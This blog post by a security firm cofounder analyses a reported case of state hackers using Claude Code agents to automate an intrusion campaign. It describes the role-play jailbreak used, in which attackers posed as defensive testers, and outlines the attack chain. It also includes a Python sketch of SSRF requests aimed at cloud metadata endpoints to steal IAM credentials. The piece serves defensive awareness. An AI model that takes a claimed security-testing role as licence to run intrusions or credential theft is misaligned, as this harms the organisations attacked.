Agentic AI

Anthropic x China Implications

Max Corbridge
Cofounder
November 19, 2025

Well, for those who have been anywhere near LinkedIn this week, it will come as no surprise what I am covering in this update. It is, of course, the recent report from Anthropic detailing how they disrupted a Chinese nation-state hacking campaign that was run almost entirely by AI agents.

This is momentous for many reasons, and its impact is what I really want to draw out today. I will begin by briefly outlining what actually happened, then share my takeaways from the event.

What happened?

Anthropic has just released a report detailing a full investigation into a Chinese nation-state hacking group, which they have dubbed GTG-1002, that successfully targeted 30 organisations and government agencies. Nation-state hacking is nothing new - it happens quite literally 24/7 - but what made this stand out is that the actual hacking campaign was carried out '80-90%' by AI, not by human operators. How does Anthropic know this? The hackers were using Anthropic's most popular product, Claude Code.

How did the hackers get what are supposed to be 'safe' AI systems - heavily trained to resist being used for malicious purposes - to engage in this attack? Using one of the oldest and simplest tricks in the book...role play. The hackers quite literally told the AI system that they worked at legitimate cybersecurity companies and were performing defensive cybersecurity testing. This is the 'jailbreak' that I have been using personally for genuine purposes for years now, and I can vouch that it works, though it sometimes needs a bit of encouragement.

Anthropic's analysis of the campaign's activity revealed that agents were largely in the driving seat of this exercise, conducting 80-90% of the attack autonomously, with humans stepping in every now and again to approve or course-correct. How can they be sure? The speed at which the attack was conducted was only possible through autonomous AI. Hilariously, the report even states that the attack could have been more successful, but the AI was found to hallucinate certain bits of information, leading it to think it had found or exploited machines when it had, in fact, made the entire thing up.

Another thing worth pointing out is the actual setup the attackers used. As mentioned, this was done using a frontier AI provider's core product. Let that sink in - it wasn't some custom, jailbroken model that the attackers trained up, but a generic AI system available to everyone in the world. Furthermore, they hadn't configured Claude Code in any particularly specialised way to achieve this - their setup simply involved an agent interacting with tools through MCP servers.

For those that are interested, the attack chain was as follows:

1) AI-driven reconnaissance and attack surface mapping on the potential targets for the attack, which included major financial institutions, tech firms, chemical manufacturing companies, and government agencies across multiple countries.

2) The initial access vector was SSRF, and exploitation was achieved through automated testing of the identified attack surface, validated through 'callback communication systems' - or what we call in this space 'command and control' infrastructure, or simply C2. Achieving initial access via SSRF leaves only two weaponisation paths open in my mind: either SSRF -> RCE, which is much trickier and requires several additional steps, or SSRF -> IMDS to grab the access token from the metadata endpoint. My bet is on the latter. To this point the only human action was to review the chosen exploit and approve it...

3) AI led the post-exploitation activities too: enumerating internal services (such as discovering metadata endpoints - so +1 for my previous point around SSRF), credential harvesting, lateral movement, data exfiltration, and even persistence. Humans were still only involved for reviews and approvals.

4) AI even generated comprehensive documentation for every stage of the attack, complete with actions taken, harvested credentials, and so on.
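To make the SSRF -> IMDS path from step 2 concrete, here is a minimal sketch of how a plain GET-based SSRF can be pointed at a cloud metadata service. The victim host, the vulnerable `url` parameter, and the `app-role` role name are all hypothetical; 169.254.169.254 is the standard link-local AWS metadata address.

```python
# Hypothetical sketch of the SSRF -> IMDS weaponisation path from step 2.
# The victim endpoint, `url` parameter, and IAM role name are made up;
# 169.254.169.254 is the standard (link-local) AWS instance metadata address.

IMDS_BASE = "http://169.254.169.254/latest/meta-data"

def build_ssrf_request(vulnerable_endpoint: str, target: str) -> str:
    """An SSRF bug means the server fetches whatever the `url` parameter says."""
    return f"{vulnerable_endpoint}?url={target}"

# Step 1: list the IAM role(s) attached to the instance.
list_roles = build_ssrf_request(
    "https://victim.example/preview",
    f"{IMDS_BASE}/iam/security-credentials/",
)

# Step 2: pull the temporary access keys for the discovered role.
grab_token = build_ssrf_request(
    "https://victim.example/preview",
    f"{IMDS_BASE}/iam/security-credentials/app-role",
)
```

Worth noting: this only works cleanly against IMDSv1. IMDSv2 requires a session token obtained via a PUT request with a custom header, which a plain GET-based SSRF typically cannot forge - one reason defenders are pushed to enforce v2.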

If the above doesn't give you pause for thought then I am not sure you are grasping the reality of the situation. To help shed some light on what this really means, here are my key conclusions.

What does this mean?

  • This is a big moment for AI security, and one we will likely look back on as a tipping point. 'AI-powered hacking' was something everyone knew to be theoretically possible, but very few real-world examples had been seen prior to this point. You could point to the recent success of AI-driven hacking tools like XBOW, but using AI to find a single weakness in a single technology (web) in isolation is nothing compared to what we see here: a full, end-to-end, sophisticated attack campaign following a multi-phase attack path and compromising real, hardened targets. It almost feels like we've skipped a step, going from 'something like this is theoretically possible in the near future' to 'nation-states are currently using this to real-world effect against hardened targets'. Literally only six or so months ago, when XBOW was topping bug bounty leaderboards, I messaged a friend saying that this type of 'low commodity' hacking (single vuln, web only, known weakness exploitation) would be the first to be replaced by AI, but that full end-to-end simulated attacks against hardened targets were still 'years away'. Well, it appears I was wrong...yet again.

  • Next is how worryingly easy this could be to recreate. Let's just recap the facts...a nation state used a (basically) free AI tool from a frontier AI provider, in a pretty standard and non-specialised setup, to automate basically everything apart from the occasional human review and approval, using the oldest and most basic jailbreak method: role playing a 'good guy'. This is the current state of AI security, folks...and yet we're still seeing enterprises and AI providers sprinting to develop and adopt increasingly powerful and autonomous AI. It is worth clarifying that this is not fully automated - there is zero doubt in my mind that skilled operators would be required to set up and navigate a successful attack of this nature - but the barrier to entry has just been lowered by about 10 rungs.

  • Less ground-breaking, but still of concern, is that we now have clear evidence that AI-driven attack campaigns will allow attackers to move much faster. Why is this worthy of note? In security breaches there is almost always a game of cat and mouse between attackers and defenders. For reasons I won't get into right now, there is usually a 'dwell time' between when an attacker lands their first foothold in the environment and when they carry out the main 'breach activities'. Defenders also have a delay to detect and respond, which they measure with metrics like mean-time-to-detect (MTTD) and mean-time-to-respond (MTTR). Essentially, most cybersecurity defence, detection, and response is built around human-led operations, and if attacks now move at double, triple, or even greater pace, that could spell disaster for the teams tasked with protecting the organisation and for the tooling they currently rely on.

  • Another, much less obvious, takeaway is just how dangerous a compromised agent can be. To clarify, the agents that conducted this attack were not 'compromised' but rather intentionally misaligned by the hackers. However, we have also seen an undeniable trend of late in which attackers target unsuspecting individuals using benign agents and try to misalign them. What this incident shows is that if they succeed, there is nothing stopping the likes of Claude Code, ChatGPT agent, or any other agentic system from being quickly and easily weaponised into a hacking tool capable of serious harm.

  • Finally, this shows in perfectly clear terms just how dire the current state of AI misalignment is. I've long said that AI in its current form suffers from several crippling systemic vulnerabilities, one of which is its inability to detect when someone is actually using it for malicious purposes - or, as we call it, 'misaligning' the AI system. Prompt injection is a problem without a defined solution and one that we don't see going away any time soon. Yet we're now graduating from GenAI to its much more dangerous younger sibling: agentic, or autonomous, AI. As predicted, the reality that these systems are not secure right down to their core technology is now being laid out for all to see in how attackers are leveraging them for harm.
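Picking up the speed point from above: the cat-and-mouse dynamic boils down to a single inequality between how long the attack takes and how long detection plus response takes. The numbers below are purely illustrative, not taken from the Anthropic report.

```python
# Illustrative numbers only - not figures from the Anthropic report.
def attacker_wins(attack_hours: float, mttd_hours: float, mttr_hours: float) -> bool:
    """True if the breach completes before defenders can detect and respond."""
    return attack_hours < mttd_hours + mttr_hours

# Human-paced campaign: days of dwell time leave defenders a window.
human_paced = attacker_wins(attack_hours=72, mttd_hours=24, mttr_hours=12)  # False

# AI-paced campaign at several times the speed: the window closes.
ai_paced = attacker_wins(attack_hours=6, mttd_hours=24, mttr_hours=12)      # True
```

The point isn't the specific numbers but the inequality itself: MTTD + MTTR targets are sized for human-speed attacks, and compressing the left-hand side flips the outcome.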

Honestly, the more I write about this the bigger an event I think it is - crazy stuff.
